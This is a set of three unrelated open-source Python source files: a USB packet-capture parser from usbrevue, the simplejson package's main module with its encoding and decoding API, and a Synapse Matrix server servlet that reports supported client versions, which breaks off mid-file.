return self.xfer_type == USBMON_TRANSFER_TYPE['isochronous']
@property
def is_bulk_xfer(self):
"""Boolean test if transfer-type is bulk"""
return self.xfer_type == USBMON_TRANSFER_TYPE['bulk']
@property
def is_control_xfer(self):
"""Boolean test if transfer-type is control"""
return self.xfer_type == USBMON_TRANSFER_TYPE['control']
@property
def is_interrupt_xfer(self):
"""Boolean test if transfer-type is interrupt"""
return self.xfer_type == USBMON_TRANSFER_TYPE['interrupt']
# NB: The usbmon doc says flag_setup should be 's' but that seems to be
# only for the text interface, because is seems to be 0x00 and
# Wireshark agrees.
@property
def is_setup_packet(self):
"""Boolean test to determine if packet is a setup packet"""
return self.flag_setup == '\x00'
@property
def is_event_type_submission(self):
"""Boolean test if event-type is submission"""
return self.event_type == 'S'
@property
def is_event_type_callback(self):
"""Boolean test if event-type is callback"""
return self.event_type == 'C'
@property
def is_event_type_error(self):
"""Boolean test if event-type is error"""
return self.event_type == 'E'
@property
def ep_dir_ch(self):
"""Single-char representation of endpoint direction"""
return ['o', 'i'][self.epnum >> 7]
@property
def endpoint_dir(self):
"""Verbose representation of endpoint direction"""
return ['outgoing', 'incoming'][self.epnum >> 7]
@property
def xfer_type_ch(self):
"""Single-char representation of xfer_type"""
return ['Z', 'I', 'C', 'B'][self.xfer_type]
@property
def transfer_type(self):
"""Verbose representation of transfer type"""
return ['Isochronous', 'Interrupt', 'Control', 'Bulk'][self.xfer_type]
@property
def addr(self):
"""Packet address"""
# Does it make sense to have two decimals followed by a hex?
return "%d:%02d:%02x" % (self.busnum, self.devnum, self.epnum)
@property
def address_verbose(self):
"""Verbose packet address"""
return "bus %d, device %d, endpoint 0x%x" % (self.busnum,
self.devnum, self.epnum)
@property
def event_type_preposition(self):
"""Verbose event-type"""
return {'S': 'Submission to',
'C': 'Callback from',
'E': 'Error on'}[self.event_type]
@property
def typedir(self):
"""Abbreviated packet type & direction, a la usbmon: 'Ci', 'Co', etc."""
return self.xfer_type_ch + self.ep_dir_ch
@property
def packet_summ(self):
"""Summary of packet event type, address, etc."""
return "%s %s (%s)" % (self.event_type, self.addr, self.typedir)
def copy(self):
"""Make a complete copy of the Packet."""
new_packet = Packet(self.hdr, self.datapack)
return new_packet
def print_pcap_fields(self):
# FIXME This should be __str__ and can probably do most or all of this
# programmatically--iterating through each attribute by offset.
# Requires that inappropriate attributes raise exceptions, etc.
"""Print detailed packet header information for debug purposes. """
print "urb = %d" % (self.urb)
print "event_type = %s" % (self.event_type)
print "xfer_type = %d" % (self.xfer_type)
print "epnum = %d" % (self.epnum)
print "devnum = %d" % (self.devnum)
print "busnum = %d" % (self.busnum)
print "flag_setup = %s" % (self.flag_setup)
print "flag_data = %s" % (self.flag_data)
print "ts_sec = %d" % (self.ts_sec,)
print "ts_usec = %d" % (self.ts_usec)
print "status = %d" % (self.status)
print "length = %d" % (self.length)
print "len_cap = %d" % (self.len_cap)
# setup is only meaningful if self.is_setup_packet is True)
if self.is_setup_packet:
print "setup = %s" % (self.setup.data_to_str())
# error_count and numdesc are only meaningful for isochronous transfers
# (xfer_type == 0)
#if (self.xfer_type == 0):
if self.is_isochronous_xfer:
print "error_count = %d" % (self.error_count)
print "numdesc = %d" % (self.numdesc)
# interval is only meaningful for isochronous or interrupt transfers)
# (xfer_type in [0,1]))
#if (self.xfer_type in [0,1]):
if self.is_isochronous_xfer or self.is_interrupt_xfer:
print "interval = %d" % (self.interval)
# start_frame is only meaningful for isochronous transfers)
if self.is_isochronous_xfer:
print "start_frame = %d" % (self.start_frame)
print "xfer_flags = %d" % (self.xfer_flags)
print "ndesc = %d" % (self.ndesc)
# print "datalen = " % (datalen)
# print "data = " % (self.data)
print "data =", self.data
# print "hdr = " % (self.hdr)
print "hdr =", self.hdr
# print "packet = " % (self.pack)
def print_pcap_summary(self):
"""Print concise pcap header summary information for debug purposes."""
print ('%s: Captured %d bytes, truncated to %d bytes' % (
datetime.datetime.now(), self.hdr.getlen(),
self.hdr.getcaplen()))
SETUP_FIELD_FORMAT = dict(
bmRequestType = ('<B', 0),
bRequest = ('<B', 1),
wValue = ('<H', 2),
wIndex = ('<H', 4),
wLength = ('<H', 6),
)
# bRequest values (with particular pmRequestType values)
SETUP_REQUEST_TYPES = dict(
GET_STATUS = 0x00,
CLEAR_FEATURE = 0x01,
# Reserved = 0x02,
SET_FEATURE = 0x03,
# Reserved = 0x04,
SET_ADDRESS = 0x05,
GET_DESCRIPTOR = 0x06,
SET_DESCRIPTOR = 0x07,
GET_CONFIGURATION = 0x08,
SET_CONFIGURATION = 0x09,
GET_INTERFACE = 0x0A,
SET_INTERFACE = 0x0B,
SYNCH_FRAME = 0x0C,
# Reserved = 0x0D,
# ... = 0xFF,
)
reverse_update_dict(SETUP_REQUEST_TYPES)
REQUEST_TYPE_DIRECTION = dict(
#-> 7_______
device_to_host = 0b10000000,
host_to_device = 0b00000000,
)
reverse_update_dict(REQUEST_TYPE_DIRECTION)
REQUEST_TYPE_TYPE = dict(
#-> _65_____
standard = 0b00000000,
class_ = 0b00100000,
vendor = 0b01000000,
reserved = 0b01100000,
)
reverse_update_dict(REQUEST_TYPE_TYPE)
REQUEST_TYPE_RECIPIENT = dict(
#-> ___43210
device = 0b00000000,
interface = 0b00000001,
endpoint = 0b00000010,
other = 0b00000011,
# Reserved = 0b000*****
)
reverse_update_dict(REQUEST_TYPE_RECIPIENT)
REQUEST_TYPE_MASK = dict(
direction = 0b10000000,
type_ = 0b01100000,
recipient = 0b00011111,
)
class SetupField(PackedFields):
"""The ``SetupField`` class provides access to the ``setup`` field of the
Packet class. As the ``setup`` field is a multi-byte field with bit-mapped
and numeric encodings, this class provides higher-level accessors which
decode the various subfields.
Dynamic accessors for this class are:
* bmRequestType
* bRequest
* wValue
* wIndex
* wLength
There are several additional accessors for the subfields of the bit-mapped
bmRequestType.
"""
def __init__(self, data=None, update_parent=None):
PackedFields.__init__(self, SETUP_FIELD_FORMAT, data, update_parent)
def _bmRequestType_mask(self, mask):
return self.bmRequestType & REQUEST_TYPE_MASK[mask]
@property
def bmRequestTypeDirection(self):
"""Decode 'direction' bits of bmRequestType. Gets and sets the
following strings:
* device_to_host
* host_to_device
"""
return REQUEST_TYPE_DIRECTION[self._bmRequestType_mask('direction')]
@bmRequestTypeDirection.setter
def bmRequestTypeDirection(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['direction'],
self.bmRequestType,
REQUEST_TYPE_DIRECTION[val])
@property
def bmRequestTypeType(self):
"""Decode 'type' bits of bmRequestType. Gets and sets the following
strings:
* standard
* class_
* vendor
* reserved
"""
return REQUEST_TYPE_TYPE[self._bmRequestType_mask('type_')]
@bmRequestTypeType.setter
def bmRequestTypeType(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['type_'],
self.bmRequestType,
REQUEST_TYPE_TYPE[val])
@property
def bmRequestTypeRecipient(self):
"""Decode 'recipient' bits of bmRequestType. Gets and sets the
following strings:
* device
* interface
* endpoint
* other
"""
return REQUEST_TYPE_RECIPIENT[self._bmRequestType_mask('recipient')]
@bmRequestTypeRecipient.setter
def bmRequestTypeRecipient(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['recipient'],
self.bmRequestType,
REQUEST_TYPE_RECIPIENT[val])
@property
def bRequest_str(self):
if self.bRequest in SETUP_REQUEST_TYPES:
return SETUP_REQUEST_TYPES[self.bRequest]
else:
return 'unknown'
def data_to_str(self):
"""Compact hex representation of setup data. Note that due to
endianness, byte orders may appear to differ from the bytes as
presented in ``fields_to_str``.
"""
return '%02X %02X %02X%02X %02X%02X %02X%02X' % \
unpack('<8B', self.datapack.tostring()) # yuck
def fields_to_str(self):
"""Verbose but single-line string representation of setup data.
"""
s = 'bmRequestType: %s, %s, %s (%s)' % (self.bmRequestTypeType,
self.bmRequestTypeDirection,
self.bmRequestTypeRecipient,
bin(self.bmRequestType))
s += '; bRequest: %s (0x%X)' % (self.bRequest_str, self.bRequest)
s += '; wValue: (0x%X)' % self.wValue
s += '; wIndex: (0x%X)' % self.wIndex
s += '; wLength: (0x%X)' % self.wLength
return s
def __str__(self):
#s = 'type: %s' % self.bmRequestTypeType
s = ''
s += self.fields_to_str()
if self.bmRequestTypeType == 'standard':
s += ', request: %s' % self.bRequest_str
s += ', direction: %s' % self.bmRequestTypeDirection
s += ', recipient: %s' % self.bmRequestTypeRecipient
#else:
s += ', data: %s' % self.data_to_str()
return s
class WrongPacketXferType(Exception):
"""Exception that should be raised when data Packet fields are accessed for
inappropriate transfer types. Note that this is currently not done."""
pass
if __name__ == '__main__':
# read a pcap file from stdin, replace the first byte of any data found
# with 0x42, and write the modified packets to stdout
import pcapy
#pcap = pcapy.open_offline('-')
#pcap = pcapy.open_offline('../test-data/usb-single-packet-8bytes-data.pcap')
pcap = pcapy.open_offline('../test-data/usb-single-packet-2.pcap')
#out = pcap.dump_open('-')
while 1:
hdr, pack = pcap.next()
if hdr is None:
break # EOF
p = Packet(hdr, pack)
#p.print_pcap_fields()
#p.print_pcap_summary()
#if len(p.data) > 0:
# p.data[0] = 0x42
#out.dump(hdr, p.repack())
| wcooley/usbrevue | usbrevue.py | Python | gpl-3.0 | 25,073 |
r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility back to Python 2.5 and (currently) has significant performance
advantages, even without using the optional C extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print(json.dumps("\"foo\bar"))
"\"foo\bar"
>>> print(json.dumps(u'\u1234'))
"\u1234"
>>> print(json.dumps('\\'))
"\\"
>>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True))
{"a": 0, "b": 0, "c": 0}
>>> from simplejson.compat import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> obj = [1,2,3,{'4': 5, '6': 7}]
>>> json.dumps(obj, separators=(',',':'), sort_keys=True)
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> print(json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' '))
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from simplejson.compat import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError('Object of type %s is not JSON serializable' %
... obj.__class__.__name__)
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 3 (char 2)
Parsing multiple documents serialized as JSON lines (newline-delimited JSON)::
>>> import simplejson as json
>>> def loads_lines(docs):
... for doc in docs.splitlines():
... yield json.loads(doc)
...
>>> sum(doc["count"] for doc in loads_lines('{"count":1}\n{"count":2}\n{"count":3}\n'))
6
Serializing multiple objects to JSON lines (newline-delimited JSON)::
>>> import simplejson as json
>>> def dumps_lines(objs):
... for obj in objs:
... yield json.dumps(obj, separators=(',',':')) + '\n'
...
>>> ''.join(dumps_lines([{'count': 1}, {'count': 2}, {'count': 3}]))
'{"count":1}\n{"count":2}\n{"count":3}\n'
"""
from __future__ import absolute_import
__version__ = '3.16.1'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
'OrderedDict', 'simple_first', 'RawJSON'
]
__author__ = 'Bob Ippolito <[email protected]>'
from decimal import Decimal
from .errors import JSONDecodeError
from .raw_json import RawJSON
from .decoder import JSONDecoder
from .encoder import JSONEncoder, JSONEncoderForHTML
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
from . import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from ._speedups import make_encoder
return make_encoder
except ImportError:
return None
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
use_decimal=True,
namedtuple_as_object=True,
tuple_as_array=True,
iterable_as_array=False,
bigint_as_string=False,
item_sort_key=None,
for_json=False,
ignore_nan=False,
int_as_string_bitcount=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
for_json=False, ignore_nan=False, int_as_string_bitcount=None,
iterable_as_array=False, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If *skipkeys* is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If *ensure_ascii* is false, then the some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If *check_circular* is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If *allow_nan* is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the original JSON specification, instead of using
the JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``). See
*ignore_nan* for ECMA-262 compliant behavior.
If *indent* is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, *separators* should be an
``(item_separator, key_separator)`` tuple. The default is ``(', ', ': ')``
if *indent* is ``None`` and ``(',', ': ')`` otherwise. To get the most
compact JSON representation, you should specify ``(',', ':')`` to eliminate
whitespace.
*encoding* is the character encoding for str instances, default is UTF-8.
*default(obj)* is a function that should return a serializable version
of obj or raise ``TypeError``. The default simply raises ``TypeError``.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *iterable_as_array* is true (default: ``False``),
any object not in the above table that implements ``__iter__()``
will be encoded as a JSON array.
If *bigint_as_string* is true (default: ``False``), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise. Note that this is still a
lossy operation that will not round-trip correctly and should be used
sparingly.
If *int_as_string_bitcount* is a positive number (n), then int of size
greater than or equal to 2**n or lower than or equal to -2**n will be
encoded as strings.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
If *for_json* is true (default: ``False``), objects with a ``for_json()``
method will use the return value of that method for encoding as JSON
instead of the object.
If *ignore_nan* is true (default: ``False``), then out of range
:class:`float` values (``nan``, ``inf``, ``-inf``) will be serialized as
``null`` in compliance with the ECMA-262 specification. If true, this will
override *allow_nan*.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg. NOTE: You should use *default* or *for_json* instead
of subclassing whenever possible.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array and not iterable_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not for_json
and not ignore_nan and int_as_string_bitcount is None
and not kw
):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
iterable_as_array=iterable_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
for_json=for_json,
ignore_nan=ignore_nan,
int_as_string_bitcount=int_as_string_bitcount,
**kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
for_json=False, ignore_nan=False, int_as_string_bitcount=None,
iterable_as_array=False, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is false then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, ``separators`` should be an
``(item_separator, key_separator)`` tuple. The default is ``(', ', ': ')``
if *indent* is ``None`` and ``(',', ': ')`` otherwise. To get the most
compact JSON representation, you should specify ``(',', ':')`` to eliminate
whitespace.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *iterable_as_array* is true (default: ``False``),
any object not in the above table that implements ``__iter__()``
will be encoded as a JSON array.
If *bigint_as_string* is true (not the default), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise.
If *int_as_string_bitcount* is a positive number (n), then int of size
greater than or equal to 2**n or lower than or equal to -2**n will be
encoded as strings.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precendence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
If *for_json* is true (default: ``False``), objects with a ``for_json()``
method will use the return value of that method for encoding as JSON
instead of the object.
If *ignore_nan* is true (default: ``False``), then out of range
:class:`float` values (``nan``, ``inf``, ``-inf``) will be serialized as
``null`` in compliance with the ECMA-262 specification. If true, this will
override *allow_nan*.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg. NOTE: You should use *default* instead of subclassing
whenever possible.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array and not iterable_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not for_json
and not ignore_nan and int_as_string_bitcount is None
and not kw
):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
iterable_as_array=iterable_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
for_json=for_json,
ignore_nan=ignore_nan,
int_as_string_bitcount=int_as_string_bitcount,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, namedtuple_as_object=True, tuple_as_array=True,
**kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg. NOTE: You should use *object_hook* or *object_pairs_hook* instead
of subclassing whenever possible.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
use_decimal=use_decimal, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg. NOTE: You should use *object_hook* or *object_pairs_hook* instead
of subclassing whenever possible.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None
and not use_decimal and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
if use_decimal:
if parse_float is not None:
raise TypeError("use_decimal=True implies parse_float=Decimal")
kw['parse_float'] = Decimal
return cls(encoding=encoding, **kw).decode(s)
def _toggle_speedups(enabled):
from . import decoder as dec
from . import encoder as enc
from . import scanner as scan
c_make_encoder = _import_c_make_encoder()
if enabled:
dec.scanstring = dec.c_scanstring or dec.py_scanstring
enc.c_make_encoder = c_make_encoder
enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
enc.py_encode_basestring_ascii)
scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
else:
dec.scanstring = dec.py_scanstring
enc.c_make_encoder = None
enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
scan.make_scanner = scan.py_make_scanner
dec.make_scanner = scan.make_scanner
global _default_decoder
_default_decoder = JSONDecoder(
encoding=None,
object_hook=None,
object_pairs_hook=None,
)
global _default_encoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def simple_first(kv):
"""Helper function to pass to item_sort_key to sort simple
elements to the top, then container elements.
"""
return (isinstance(kv[1], (list, dict, tuple)), kv[0])
| SickGear/SickGear | lib/simplejson/__init__.py | Python | gpl-3.0 | 24,480 |
# Copyright 2016 OpenMarket Ltd
# Copyright 2017 Vector Creations Ltd
# Copyright 2018-2019 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import TYPE_CHECKING, Tuple
from twisted.web.server import Request
from synapse.api.constants import RoomCreationPreset
from synapse.http.server import HttpServer
from synapse.http.servlet import RestServlet
from synapse.types import JsonDict
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class VersionsRestServlet(RestServlet):
PATTERNS = [re.compile("^/_matrix/client/versions$")]
def __init__(self, hs: "HomeServer"):
super().__init__()
self.config = hs.config
# Calculate these once since they shouldn't change after start-up.
self.e2ee_forced_public = (
RoomCreationPreset.PUBLIC_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
self.e2ee_forced_private = (
RoomCreationPreset.PRIVATE_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
self.e2ee_forced_trusted_private = (
RoomCreationPreset.TRUSTED_PRIVATE_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
def on_GET(self, request: Request) -> Tuple[int, JsonDict]:
return (
200,
{
"versions": [
# XXX: at some point we need to decide whether we need to include
# the previous version numbers, given we've defined r0.3.0 to be
# backwards compatible with r0.2.0. But need to check how
# conscientious we've been in compatibility, and decide whether the
# middle number is the major revision when at 0.X.Y (as opposed to
# X.Y.Z). And we need to decide whether it's fair to make clients
# parse the version string to figure out what's going on.
"r0.0.1",
"r0.1.0",
"r0.2.0",
"r0.3.0",
"r0.4.0",
"r0.5.0",
"r0.6.0",
"r0.6.1",
"v1.1",
"v1.2",
],
# as per MSC1497:
"unstable_features": {
# Implements support for label-based filtering as described in
# MSC2326.
"org.matrix.label_based_filtering": True,
# Implements support for cross signing as described in MSC1756
"org.matrix.e2e_cross_signing": True,
# Implements additional endpoints as described in MSC2432
"org.matrix.msc2432": True,
# Implements additional endpoints as described in MSC2666
"uk.half-shot.msc2666": True,
# Whether new rooms will be set to encrypted or not (based on presets).
"io.element.e2ee_forced.public": self.e2ee_forced_public,
